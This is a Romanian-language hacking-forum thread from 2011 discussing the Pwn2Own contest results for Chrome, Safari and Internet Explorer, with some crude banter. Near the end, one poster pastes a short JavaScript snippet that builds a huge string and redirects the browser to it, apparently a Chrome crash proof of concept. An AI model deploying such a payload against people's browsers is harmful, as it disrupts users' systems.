rob33rt Posted March 11, 2011 Report Posted March 11, 2011 Saptamana aceasta a demarat cea mai renumita competitie de hacking, Pwn2Own, competitie in care Google a pariat 20.000 de dolari pe Chrome. Si a castigat! In prima zi de concurs nicio echipa nu a reusit sa exploateze vulnerabilitatile din browser-ul Google. Nici nu au fost prea multi la numar cei care s-au aventurat sa isi masoare fortele cu sistemul Google. Chrome a inregistrat numai doi participanti dornici sa incerce hackuirea browserului. Daca, pana la sfarsitul competitiei, browser-ul Google ramane neatins, va inregistra un adevarat record, fiind al treilea an in care participantii nu reusesc sa ii exploateze sistemul de securitate.Nu la fel de norocoasi au fost cei de la Apple si Microsoft, care au cazut in mainile primilor hackeri care si-au incercat norocul cu ele.Desi in ziua concursului Apple a updatat Safari la versiunea 5.0.4, reparand 64 de vulnerabilitati, o echipa de hackeri tot a reusit sa sparga browser-ul. De-a dreptul jenant pentru baietii din Cupertino este timpul in care s-a reusit acest luccru: 5 secunde!!! Echipa de hackeri a plecat acasa cu 15.000 de dolari si un MacBook Air nou-nout.De Internet Explorer 8 s-a ocupat specialistul in securitate Stephen Fewer, care a folosit un trio de vulnerabilitati pentru a hackui browser-ul instalat pe un Windows 7.Astazi este ultima zi a competitiei, iar vanatorii de brese de securitate vor testa siguranta platformelor pentru smartphone-uri de la Apple (iOS), Google (Android), Microsoft (Windows Phone 7) si RIM (BlackBerry OS).Sursa:http://www.computerworld.com/s/article/9214022/Google_s_Chrome_untouched_at_Pwn2Own_hack_match?source=CTWNLE_nlt_dailyam_2011-03-10 Quote
crs12decoder Posted March 11, 2011 Report Posted March 11, 2011 Ca si cum ai face sex cu degetele Quote
daatdraqq Posted March 11, 2011 Report Posted March 11, 2011 Care sunt regulile in competitiile astea ? Ce considera ei vulnerabilitate demna sa ia premiul cel mare?Am vazut ca si @TinKode a gasit cateva si nu i-au dat nimic . Quote
immun3 Posted March 11, 2011 Report Posted March 11, 2011 tink gaseste aproape in orice vulnerabilitati Quote
ZeroCold Posted March 11, 2011 Report Posted March 11, 2011 De-a dreptul jenant pentru baietii din Cupertino este timpul in care s-a reusit acest luccru: 5 secunde!!! Dute baaa cum naiba ? Quote
MagicThunder Posted March 11, 2011 Report Posted March 11, 2011 vad ca esti cam pupincurist,crezi ca daca il ridici in slavi o sa iti arunce si tie un root?pune osul la treaba prietene si invata. Quote
Andrei Posted March 11, 2011 Report Posted March 11, 2011 Regulile sunt destul de clare. Tu trebuie sa dovedesti ca poti executa cod arbitrar pe computerul victimei, pe langa faptul trebuie sa dovedesti ca ai acces asupra hard disk-ului (implicit ai facut bypass la sandbox).Am scris si eu despre asta. Tinkode gaseste chestii interesante, dar nu se compara cu avengura problemelor de securitate care se discuta acolo. E un alt nivel, alte tehnici, alt domeniu (Chrome e un browser, Tinkode se specializeaza pe partea de web, cel putin pana acum). Quote
Sok(er) Posted March 12, 2011 Report Posted March 12, 2011 Desi in ziua concursului Apple a updatat Safari la versiunea 5.0.4, reparand 64 de vulnerabilitati, o echipa de hackeri tot a reusit sa sparga browser-ul. De-a dreptul jenant pentru baietii din Cupertino este timpul in care s-a reusit acest luccru: 5 secunde!!! 5 secunde pe draqu:)) Quote
Guest Praetorian Posted March 12, 2011 Report Posted March 12, 2011 Care sunt regulile in competitiile astea ? Ce considera ei vulnerabilitate demna sa ia premiul cel mare?Am vazut ca si @TinKode a gasit cateva si nu i-au dat nimic .Nimic nu inseamna chiar nimic. Nu totul se rezuma la bani uneori.In cazul competitiei de mai sus nu e vorba despre ce am mai gasit si eu cu Sony, e vorba despre browsere, sa gasesti vulnerabilitati in ele, cum spunea si AndrewBoy.La partea de web, trebuie sa gasesti vulnerabilitati care pun in pericol securitatea utilizatorilor google.com ca sa fie calificate pentru o suma de bani (dar asta nu inseamna ca si una care nu ii pune, nu este importanta).Alea 5 secunde de care va mirati toti, stati fara griji ca au venit cu temele de acasa, nu le-au pus un alt browser fata de cel pe care il stiau si au mai facut teste pe el. Quote
rob33rt Posted March 13, 2011 Author Report Posted March 13, 2011 Google Chrome: --- ><script type="text/javascript">function mul(str,count){ if(count==0) return ''; var binaryCount = count.toString(2); var numDegree = binaryCount.length; var resultStr=''; for(var i=0; i<numDegree; i++){ resultStr+=resultStr; if(binaryCount.charAt(i) == '1'){ resultStr+=str; } } return resultStr;}var junka = "a";var junk = mul(junka,2304453);window.location.replace("http://" + junk);</script></head><body></body></html>La asta va referiti ? Quote
alpinegvs Posted March 14, 2011 Report Posted March 14, 2011 da internet explorer 9..? e prea vulnerabil sau de ce sau bazat ei pe 8? Quote
Andrei Posted March 14, 2011 Report Posted March 14, 2011 Se verifica doar variantele stabile, iar IE9 nu este stable la data evenimentului. Quote